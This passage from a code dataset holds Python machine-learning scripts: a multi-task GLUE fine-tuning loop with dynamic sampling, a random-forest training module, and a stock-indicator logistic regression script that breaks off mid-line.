tokenizer))\r\n sst2_train_dataset = sst2_train_dataset.map(make_encoder('sst2', tokenizer))\r\n sst2_val_dataset = sst2_val_dataset.map(make_encoder('sst2', tokenizer))\r\n mrpc_train_dataset = mrpc_train_dataset.map(make_encoder('mrpc', tokenizer))\r\n mrpc_val_dataset = mrpc_val_dataset.map(make_encoder('mrpc', tokenizer))\r\n qqp_train_dataset = qqp_train_dataset.map(make_encoder('qqp', tokenizer))\r\n qqp_val_dataset = qqp_val_dataset.map(make_encoder('qqp', tokenizer))\r\n mnli_train_dataset = mnli_train_dataset.map(make_encoder('mnli', tokenizer))\r\n mnli_val_dataset = mnli_val_dataset.map(make_encoder('mnli', tokenizer))\r\n rte_train_dataset = rte_train_dataset.map(make_encoder('rte', tokenizer))\r\n rte_val_dataset = rte_val_dataset.map(make_encoder('rte', tokenizer))\r\n qnli_train_dataset = qnli_train_dataset.map(make_encoder('qnli', tokenizer))\r\n qnli_val_dataset = qnli_val_dataset.map(make_encoder('qnli', tokenizer))\r\n wnli_train_dataset = wnli_train_dataset.map(make_encoder('wnli', tokenizer))\r\n wnli_val_dataset = wnli_val_dataset.map(make_encoder('wnli', tokenizer))\r\n \r\n cola_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n sst2_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 
'attention_mask', 'label', 'pointer_mask'])\r\n mrpc_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qqp_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n rte_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n wnli_train_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n \r\n cola_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n sst2_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mrpc_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qqp_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n mnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n rte_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n qnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n wnli_val_dataset.set_format(type='torch', columns=['input_ids', 'token_type_ids', 'attention_mask', 'label', 'pointer_mask'])\r\n\r\n\r\n total_size = len(cola_train_dataset) + len(sst2_train_dataset) + len(mrpc_train_dataset) + len(qqp_train_dataset) + len(mnli_train_dataset) + len(rte_train_dataset) + len(qnli_train_dataset) + len(wnli_train_dataset)\r\n sample_size = total_size // 10\r\n\r\n inst_sampler = InstanceSampler(sample_size, cola_train_dataset, sst2_train_dataset, mrpc_train_dataset, qqp_train_dataset, mnli_train_dataset, rte_train_dataset, qnli_train_dataset, wnli_train_dataset, dynamic=True)\r\n \r\n train_dataset = inst_sampler.get_sample()\r\n print(\"total size of training data is\", total_size)\r\n \r\n train_dataloader = DataLoader(\r\n train_dataset, \r\n sampler = RandomSampler(train_dataset),\r\n batch_size = batch_size \r\n )\r\n\r\n # =========================================================\r\n # We make one validation dataloader for each dataset.\r\n # Validation accuracy of each dataset is used to set \r\n # the weights of dynamic sampling.\r\n # =========================================================\r\n cola_val_dataloader = DataLoader(\r\n cola_val_dataset,\r\n sampler = SequentialSampler(cola_val_dataset), \r\n batch_size = batch_size \r\n )\r\n sst2_val_dataloader = DataLoader(\r\n sst2_val_dataset,\r\n sampler = SequentialSampler(sst2_val_dataset), \r\n batch_size = batch_size \r\n )\r\n mrpc_val_dataloader = DataLoader(\r\n mrpc_val_dataset,\r\n sampler = SequentialSampler(mrpc_val_dataset), \r\n batch_size = batch_size \r\n )\r\n qqp_val_dataloader = DataLoader(\r\n qqp_val_dataset,\r\n sampler = SequentialSampler(qqp_val_dataset), \r\n batch_size = batch_size \r\n )\r\n mnli_val_dataloader = DataLoader(\r\n mnli_val_dataset,\r\n 
sampler = SequentialSampler(mnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n rte_val_dataloader = DataLoader(\r\n rte_val_dataset,\r\n sampler = SequentialSampler(rte_val_dataset), \r\n batch_size = batch_size \r\n )\r\n qnli_val_dataloader = DataLoader(\r\n qnli_val_dataset,\r\n sampler = SequentialSampler(qnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n wnli_val_dataloader = DataLoader(\r\n wnli_val_dataset,\r\n sampler = SequentialSampler(wnli_val_dataset), \r\n batch_size = batch_size \r\n )\r\n\r\n # ====================================================\r\n # Set up optimizer and scheduler for training.\r\n # ====================================================\r\n optimizer = AdamW(model.parameters(),\r\n lr = FLAGS.learning_rate, \r\n eps = FLAGS.epsilon\r\n )\r\n\r\n epochs = FLAGS.num_epochs\r\n total_steps = len(train_dataloader) * epochs\r\n scheduler = get_linear_schedule_with_warmup(optimizer, \r\n num_warmup_steps = 0,\r\n num_training_steps = total_steps)\r\n \r\n training_stats = []\r\n total_t0 = time.time()\r\n for epoch_i in range(0, epochs):\r\n print(\"size of instance sample is\", len(train_dataset))\r\n \r\n # ========================================\r\n # Training\r\n # ========================================\r\n \r\n # Perform one full pass over the training set.\r\n\r\n print(\"\")\r\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\r\n print('Training...')\r\n\r\n # Measure how long the training epoch takes.\r\n t0 = time.time()\r\n\r\n # Reset the total loss for this epoch.\r\n total_train_loss = 0\r\n\r\n total_train_accuracy = 0\r\n\r\n model.train()\r\n\r\n # For each batch of training data...\r\n for step, batch in enumerate(train_dataloader):\r\n # Progress update every 400 batches.\r\n if step % 400 == 0 and not step == 0:\r\n # Calculate elapsed time in minutes.\r\n elapsed = format_time(time.time() - t0)\r\n \r\n # Report progress.\r\n print(' Batch {:>5,} of {:>5,}. 
Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\r\n\r\n            b_input_ids = batch['input_ids'].to(device)\r\n            b_token_type_ids = batch['token_type_ids'].to(device)\r\n            b_input_mask = batch['attention_mask'].to(device)\r\n            b_labels = batch['label'].to(device)\r\n            b_pointer_mask = batch['pointer_mask'].to(device)\r\n\r\n            model.zero_grad()        \r\n\r\n            loss, logits = model(b_input_ids, \r\n                                 token_type_ids=b_token_type_ids, \r\n                                 attention_mask=b_input_mask, \r\n                                 labels=b_labels,\r\n                                 pointer_mask=b_pointer_mask)\r\n        \r\n            logits = logits.detach().cpu().numpy()\r\n            label_ids = b_labels.to('cpu').numpy()\r\n\r\n            total_train_accuracy += flat_accuracy(logits, label_ids)\r\n            total_train_loss += loss.item()\r\n            loss.backward()\r\n            torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n\r\n            optimizer.step()\r\n            scheduler.step()\r\n\r\n        # Calculate the average loss over all of the batches.\r\n        avg_train_loss = total_train_loss / len(train_dataloader)            \r\n\r\n        avg_train_accuracy = total_train_accuracy / len(train_dataloader)            \r\n        \r\n        # Measure how long this epoch took.\r\n        training_time = format_time(time.time() - t0)\r\n\r\n        print(\"\")\r\n        print(\"  Average training accuracy: {0:.2f}\".format(avg_train_accuracy))\r\n        print(\"  Average training loss: {0:.2f}\".format(avg_train_loss))\r\n        print(\"  Training epoch took: {:}\".format(training_time))\r\n        \r\n        # ========================================\r\n        #               Validation\r\n        # ========================================\r\n        # After the completion of each training epoch, measure our performance on\r\n        # our validation set.\r\n\r\n        print(\"\")\r\n        print(\"Running Validation...\")\r\n\r\n        t0 = time.time()\r\n\r\n        # Put the model in evaluation mode--the dropout layers behave differently\r\n        # during evaluation.\r\n        model.eval()\r\n\r\n        # ========================================\r\n        #               Cola Validation\r\n        # ========================================\r\n\r\n        total_cola_eval_accuracy = 0\r\n        total_cola_eval_loss = 0\r\n\r\n        for batch in cola_val_dataloader:\r\n            b_input_ids = batch['input_ids'].to(device)\r\n            b_token_type_ids = batch['token_type_ids'].to(device)\r\n            b_input_mask = batch['attention_mask'].to(device)\r\n            b_labels = batch['label'].to(device)\r\n            b_pointer_mask = batch['pointer_mask'].to(device)\r\n        \r\n            with torch.no_grad():        \r\n                (loss, logits) = model(b_input_ids, \r\n                                       token_type_ids=b_token_type_ids, \r\n                                       attention_mask=b_input_mask,\r\n                                       labels=b_labels,\r\n                                       pointer_mask=b_pointer_mask)\r\n            \r\n            total_cola_eval_loss += loss.item()\r\n\r\n            logits = logits.detach().cpu().numpy()\r\n            label_ids = b_labels.to('cpu').numpy()\r\n            total_cola_eval_accuracy += flat_accuracy(logits, label_ids)        \r\n\r\n        avg_cola_val_accuracy = total_cola_eval_accuracy / len(cola_val_dataloader)\r\n        print(\"  Cola Accuracy: {0:.2f}\".format(avg_cola_val_accuracy))\r\n\r\n        avg_cola_val_loss = total_cola_eval_loss / len(cola_val_dataloader)\r\n        print(\"  Cola Validation Loss: {0:.2f}\".format(avg_cola_val_loss))\r\n\r\n        # ========================================\r\n        #               SST-2 Validation\r\n        # ========================================\r\n\r\n        total_sst2_eval_accuracy = 0\r\n        total_sst2_eval_loss = 0\r\n\r\n        for batch in sst2_val_dataloader:\r\n            b_input_ids = batch['input_ids'].to(device)\r\n            b_token_type_ids = batch['token_type_ids'].to(device)\r\n            b_input_mask = batch['attention_mask'].to(device)\r\n            b_labels = batch['label'].to(device)\r\n            b_pointer_mask = batch['pointer_mask'].to(device)\r\n        \r\n            with torch.no_grad():        \r\n                (loss, logits) = model(b_input_ids, \r\n                                       
token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_sst2_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_sst2_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_sst2_val_accuracy = total_sst2_eval_accuracy / len(sst2_val_dataloader)\r\n print(\" SST-2 Accuracy: {0:.2f}\".format(avg_sst2_val_accuracy))\r\n\r\n avg_sst2_val_loss = total_sst2_eval_loss / len(sst2_val_dataloader)\r\n print(\" SST-2 Validation Loss: {0:.2f}\".format(avg_sst2_val_loss))\r\n\r\n # ========================================\r\n # MRPC Validation\r\n # ========================================\r\n\r\n total_mrpc_eval_accuracy = 0\r\n total_mrpc_eval_loss = 0\r\n\r\n for batch in mrpc_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_mrpc_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_mrpc_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_mrpc_val_accuracy = total_mrpc_eval_accuracy / len(mrpc_val_dataloader)\r\n print(\" MRPC Accuracy: {0:.2f}\".format(avg_mrpc_val_accuracy))\r\n\r\n avg_mrpc_val_loss = total_mrpc_eval_loss / len(mrpc_val_dataloader)\r\n print(\" MRPC Validation Loss: {0:.2f}\".format(avg_mrpc_val_loss))\r\n\r\n # ========================================\r\n # QQP Validation\r\n # ========================================\r\n\r\n total_qqp_eval_accuracy = 0\r\n total_qqp_eval_loss = 0\r\n\r\n for batch in qqp_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_qqp_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_qqp_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_qqp_val_accuracy = total_qqp_eval_accuracy / len(qqp_val_dataloader)\r\n print(\" QQP Accuracy: {0:.2f}\".format(avg_qqp_val_accuracy))\r\n\r\n avg_qqp_val_loss = total_qqp_eval_loss / len(qqp_val_dataloader)\r\n print(\" QQP Validation Loss: {0:.2f}\".format(avg_qqp_val_loss))\r\n\r\n # ========================================\r\n # MNLI Validation\r\n # ========================================\r\n\r\n total_mnli_eval_accuracy = 0\r\n total_mnli_eval_loss = 0\r\n\r\n for batch in mnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n 
token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_mnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_mnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_mnli_val_accuracy = total_mnli_eval_accuracy / len(mnli_val_dataloader)\r\n print(\" MNLI Accuracy: {0:.2f}\".format(avg_mnli_val_accuracy))\r\n\r\n avg_mnli_val_loss = total_mnli_eval_loss / len(mnli_val_dataloader)\r\n print(\" MNLI Validation Loss: {0:.2f}\".format(avg_mnli_val_loss))\r\n\r\n # ========================================\r\n # RTE Validation\r\n # ========================================\r\n\r\n total_rte_eval_accuracy = 0\r\n total_rte_eval_loss = 0\r\n\r\n for batch in rte_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_rte_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_rte_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_rte_val_accuracy = total_rte_eval_accuracy / len(rte_val_dataloader)\r\n print(\" RTE Accuracy: {0:.2f}\".format(avg_rte_val_accuracy))\r\n\r\n avg_rte_val_loss = total_rte_eval_loss / len(rte_val_dataloader)\r\n print(\" RTE Validation Loss: {0:.2f}\".format(avg_rte_val_loss))\r\n\r\n # ========================================\r\n # QNLI Validation\r\n # ========================================\r\n\r\n total_qnli_eval_accuracy = 0\r\n total_qnli_eval_loss = 0\r\n\r\n for batch in qnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_qnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_qnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_qnli_val_accuracy = total_qnli_eval_accuracy / len(qnli_val_dataloader)\r\n print(\" QNLI Accuracy: {0:.2f}\".format(avg_qnli_val_accuracy))\r\n\r\n avg_qnli_val_loss = total_qnli_eval_loss / len(qnli_val_dataloader)\r\n print(\" QNLI Validation Loss: {0:.2f}\".format(avg_qnli_val_loss))\r\n\r\n # ========================================\r\n # WNLI Validation\r\n # ========================================\r\n\r\n total_wnli_eval_accuracy = 0\r\n total_wnli_eval_loss = 0\r\n\r\n for batch in wnli_val_dataloader:\r\n b_input_ids = batch['input_ids'].to(device)\r\n b_token_type_ids = batch['token_type_ids'].to(device)\r\n b_input_mask = batch['attention_mask'].to(device)\r\n b_labels = batch['label'].to(device)\r\n b_pointer_mask = batch['pointer_mask'].to(device)\r\n \r\n with torch.no_grad(): \r\n (loss, logits) = model(b_input_ids, \r\n 
token_type_ids=b_token_type_ids, \r\n attention_mask=b_input_mask,\r\n labels=b_labels,\r\n pointer_mask=b_pointer_mask)\r\n \r\n total_wnli_eval_loss += loss.item()\r\n\r\n logits = logits.detach().cpu().numpy()\r\n label_ids = b_labels.to('cpu').numpy()\r\n total_wnli_eval_accuracy += flat_accuracy(logits, label_ids) \r\n\r\n avg_wnli_val_accuracy = total_wnli_eval_accuracy / len(wnli_val_dataloader)\r\n print(\" WNLI Accuracy: {0:.2f}\".format(avg_wnli_val_accuracy))\r\n\r\n avg_wnli_val_loss = total_wnli_eval_loss / len(wnli_val_dataloader)\r\n print(\" WNLI Validation Loss: {0:.2f}\".format(avg_wnli_val_loss))\r\n\r\n\r\n avg_tot_val_accuracy = (avg_cola_val_accuracy + avg_sst2_val_accuracy + avg_mrpc_val_accuracy + avg_qqp_val_accuracy\r\n + avg_mnli_val_accuracy + avg_rte_val_accuracy + avg_qnli_val_accuracy + avg_wnli_val_accuracy) / 8\r\n\r\n avg_tot_val_loss = (avg_cola_val_loss + avg_sst2_val_loss + avg_mrpc_val_loss + avg_qqp_val_loss \r\n + avg_mnli_val_loss + avg_rte_val_loss + avg_qnli_val_loss + avg_wnli_val_loss) / 8\r\n\r\n # Measure how long the validation run took.\r\n validation_time = format_time(time.time() - t0)\r\n print(\" Total Validation took: {:}\".format(validation_time))\r\n\r\n\r\n # Record all statistics from this epoch.\r\n training_stats.append(\r\n {\r\n 'epoch': epoch_i + 1,\r\n 'Training Accur.': avg_train_accuracy,\r\n 'Training Loss': avg_train_loss,\r\n 'COLA Valid. Loss': avg_cola_val_loss,\r\n 'COLA Valid. Accur.': avg_cola_val_accuracy,\r\n 'SST-2 Valid. Loss': avg_sst2_val_loss,\r\n 'SST-2 Valid. Accur.': avg_sst2_val_accuracy,\r\n 'MRPC Valid. Loss': avg_mrpc_val_loss,\r\n 'MRPC Valid. Accur.': avg_mrpc_val_accuracy,\r\n 'QQP Valid. Loss': avg_qqp_val_loss,\r\n 'QQP Valid. Accur.': avg_qqp_val_accuracy,\r\n 'MNLI Valid. Loss': avg_mnli_val_loss,\r\n 'MNLI Valid. Accur.': avg_mnli_val_accuracy,\r\n 'RTE Valid. Loss': avg_rte_val_loss,\r\n 'RTE Valid. Accur.': avg_rte_val_accuracy,\r\n 'QNLI Valid. Loss': avg_qnli_val_loss,\r\n 'QNLI Valid. Accur.': avg_qnli_val_accuracy,\r\n 'WNLI Valid. Loss': avg_wnli_val_loss,\r\n 'WNLI Valid. Accur.': avg_wnli_val_accuracy,\r\n 'Avg Total Valid. Accur.' : avg_tot_val_accuracy,\r\n 'Avg Total Valid. Loss' : avg_tot_val_loss,\r\n 'Training Time': training_time,\r\n 'Validation Time': validation_time\r\n }\r\n )\r\n\r\n if FLAGS.dynamic_sampling:\r\n print(\"Updating weights for dynamic sampling...\")\r\n cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score = get_scores_from_acc(avg_cola_val_accuracy, avg_sst2_val_accuracy, \r\n avg_mrpc_val_accuracy, avg_qqp_val_accuracy, avg_mnli_val_accuracy, avg_rte_val_accuracy, avg_qnli_val_accuracy, avg_wnli_val_accuracy)\r\n inst_sampler.update_weights(cola_score, sst2_score, mrpc_score, qqp_score, mnli_score, rte_score, qnli_score, wnli_score)\r\n train_dataset = inst_sampler.get_sample()\r\n train_dataloader = DataLoader(\r\n train_dataset, \r\n sampler = RandomSampler(train_dataset),\r\n batch_size = batch_size \r\n )\r\n\r\n print(\"\")\r\n print(\"Training complete!\")\r\n\r\n print(\"Total training took {:} (h:mm:ss)\".format(format_time(time.time()-total_t0)))\r\n\r\n pd.set_option('precision', 4)\r\n df_stats = pd.DataFrame(data=training_stats)\r\n df_stats = df_stats.set_index('epoch')\r\n df_stats.head(5)\r\n","sub_path":"test_dynamicloader.py","file_name":"test_dynamicloader.py","file_ext":"py","file_size_in_byte":30594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
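The training script above depends on get_scores_from_acc and InstanceSampler, which are defined elsewhere in the repo. As a rough illustration of the idea only (not the repo's actual implementation), accuracy-driven sampling weights can be derived by giving tasks with lower validation accuracy a larger share of the next epoch's sample, for example via a softmax over error rates:

# Hypothetical sketch of accuracy-driven task weighting; the repo's
# get_scores_from_acc / InstanceSampler may compute something different.
import numpy as np

def scores_from_accuracies(accuracies, temperature=1.0):
    """Map per-task validation accuracies to sampling weights.

    Tasks with lower accuracy get proportionally more weight, so the
    next epoch's mixed sample over-represents the tasks the model is
    currently worst at.
    """
    errors = 1.0 - np.asarray(accuracies, dtype=float)
    logits = errors / temperature
    weights = np.exp(logits - logits.max())   # numerically stable softmax
    return weights / weights.sum()

# Example: 8 GLUE tasks; the worst task gets the largest weight.
accs = [0.81, 0.92, 0.86, 0.90, 0.84, 0.66, 0.89, 0.56]
print(scores_from_accuracies(accs).round(3))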
+{"seq_id":"147961349","text":"# ************Decision Tree***************** /\n#___________________________________________________________/\n__author__ = \"EA\"\n# -*- coding: utf-8 -*-\n\nfrom feature_selector import FeatureSelector\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.model_selection import GridSearchCV\n\n#Tree visualization library\n# from sklearn.externals.six import StringIO\n# from IPython.display import Image\n# from sklearn.tree import export_graphviz\n# import pydotplus\nimport json\nfrom Models import utils\n\n\n\n#***********Data spliting\n\ndef splitData(dataFrame, trainTestValidation):\n\n X=dataFrame.iloc[:,:-1].values\n y=dataFrame.iloc[:,-1].values\n #***************Split data into train,test\n\n if(trainTestValidation != None):\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=trainTestValidation['test_size'], random_state=1)\n\n #***************split train again into validation and train\n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=trainTestValidation['validation_size'], random_state=1)\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\n\ndef TrainingDefaultParameters(X_train, y_train):\n\n clf = RandomForestClassifier()\n clf.fit(X_train,y_train)\n return clf\n\n\ndef TrainingFine_tunning(X_train, y_train,parameters):\n if(parameters != None):\n clf = RandomForestClassifier()\n clf.set_params(**parameters)\n clf.fit(X_train,y_train)\n return clf\n\n\n\n#***************************Auto-tuning : choix automatique des macro-paramètres de Decision Tree\n#________________________________________________________________________________________________|\n\n\ndef autotuning(X_train, y_train):\n\n\n parameters={'min_samples_split' : range(5,500,20),'max_depth': range(1,20,2)}\n clf_tree=RandomForestClassifier()\n clf=GridSearchCV(clf_tree,parameters)\n clf.fit(X_train,y_train)\n #print(clf.best_estimator_)\n trained_model=clf.best_estimator_.fit(X_train,y_train)\n return trained_model\n\n\n#**************************Make prediction\n#__________________________________________|\ndef testSetPrediction(X_test,X_val,clf):\n\n predict_test=clf.predict(X_test)\n predict_val=clf.predict(X_val)\n return predict_test,predict_val\n\n\n\n#**************************Evaluation\n#____________________________________|\ndef scoring(y_test,predict_test,y_val,predict_val):\n\n data={}\n\n data[\"accuracy_score_Test\"] = accuracy_score(y_test,predict_test)\n data[\"roc_auc_score_Test\"] = log_loss(y_test,predict_test)\n\n\n data[\"accuracy_score_Val\"] = accuracy_score(y_val,predict_val)\n \n return data\n# #Variable Selection\n# def feature_selector(dataFrame,train_labels):\n\n# fs = FeatureSelector(data = dataFrame, labels = train_labels)\n# fs.identify_missing(missing_threshold = 0.6)\n\n# '''This method finds pairs of collinear features based on the Pearson correlation coefficient.\n# For each pair above the specified threshold (in terms of absolute value),\n# it identifies one of the variables to be removed. 
'''\n\n#     fs.identify_collinear(correlation_threshold = 0.98)\n#     fs.identify_zero_importance(task = 'regression',\n#     eval_metric = 'auc',\n#     n_iterations = 10,\n#     early_stopping = True)\n\n#     # list of zero importance features\n#     zero_importance_features = fs.ops['zero_importance']\n\n#     # we have identified the features to remove: features with missing values, features with low importance\n#     train_no_missing_zero = fs.remove(methods = ['missing', 'zero_importance'])\n\n#     all_to_remove = fs.check_removal()\n\n#     return train_no_missing_zero\n\n# def visualization(dtree):\n#     dot_data = StringIO()\n#     export_graphviz(dtree, out_file=dot_data,\n#     filled=True, rounded=True,\n#     special_characters=True)\n#     graph = pydotplus.graph_from_dot_data(dot_data.getvalue())\n#     image=Image(graph.create_png())\n#     utils.ensure_dir(\"output/visualisation\")\n#     Image(graph.write_png('output/visualisation/Tree_visu.png'))\n#     return image\n","sub_path":"Models/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
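A minimal end-to-end use of the Models/RandomForest.py module above might look as follows; the CSV file name and the split sizes are placeholders chosen for illustration, not values taken from the repo:

# Hypothetical driver for Models/RandomForest.py; "dataset.csv" and the
# split fractions are assumptions.
import pandas as pd
from Models import RandomForest as rf

df = pd.read_csv("dataset.csv")  # last column must be the label
X_train, y_train, X_val, y_val, X_test, y_test = rf.splitData(
    df, {"test_size": 0.2, "validation_size": 0.2})

clf = rf.autotuning(X_train, y_train)  # GridSearchCV over depth / min split
predict_test, predict_val = rf.testSetPrediction(X_test, X_val, clf)
print(rf.scoring(y_test, predict_test, y_val, predict_val))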
+{"seq_id":"153299146","text":"import Ind\r\nimport pandas as pd\r\ndata=pd.read_excel('data.xlsx')\r\nMA= Ind.MA(data,5,10,20) \r\nmacd=Ind.MACD(data)\r\nkdj=Ind.KDJ(data,9)\r\nrsi6=Ind.RSI(data,6)\r\nrsi12=Ind.RSI(data,12)\r\nrsi24=Ind.RSI(data,24)\r\nbias5=Ind.BIAS(data,5)\r\nbias10=Ind.BIAS(data,10)\r\nbias20=Ind.BIAS(data,20)\r\nobv=Ind.OBV(data) \r\ny=Ind.cla(data)\r\n\r\n#将计算出的技术指标与交易日期以及股价的涨跌趋势利用字典整合在一起\r\npm={'交易日期':data['Trddt'].values}\r\nPM=pd.DataFrame(pm)\r\nDF={'MA5':MA[0],'MA10':MA[1],'MA20':MA[2],'MACD':macd,\r\n 'K':kdj[0],'D':kdj[1],'J':kdj[2],'RSI6':rsi6,'RSI12':rsi12,\r\n 'RSI24':rsi24,'BIAS5':bias5,'BIAS10':bias10,'BIAS20':bias20,'OBV':obv}\r\nDF=pd.DataFrame(DF)\r\ns1=PM.join(DF)\r\n\r\ny1={'涨跌趋势':y}\r\nZZ=pd.DataFrame(y1)\r\ns2=s1.join(ZZ)\r\n\r\n#去掉空值\r\nss=s2.dropna()\r\n#将ss中第6列不为0的值提取出来,存放到Data中\r\nData=ss[ss.iloc[:,6].values!=0]\r\n\r\n #提取训练和预测数据\r\nx1=Data['交易日期']>='2017-01-01'\r\nx2=Data['交易日期']<='2017-11-30'\r\nxx=x1&x2\r\nindex=xx.values==True\r\nindex1=xx.values==False\r\nx_train=Data.iloc[index,1:15] \r\ny_train=Data.iloc[index,[15]]\r\nx_test=Data.iloc[index1,1:15]\r\ny_test=Data.iloc[index1,[15]]\r\n\r\n\r\n#数据标准化\r\nfrom sklearn.preprocessing import StandardScaler \r\nscaler = StandardScaler()\r\nscaler.fit(x_train) \r\nx_train=scaler.transform(x_train)\r\nx_test=scaler.transform(x_test) \r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression as LR\r\nclf = LR()\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, y_train)\r\n'''\r\nfrom sklearn.neural_network import MLPClassifier\r\nclf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n hidden_layer_sizes=8, random_state=1)\r\n # 多个隐含层hidden_layer_sizes(5,2)\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, y_train)\r\n\r\nfrom sklearn import svm\r\nclf = svm.SVC()\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, 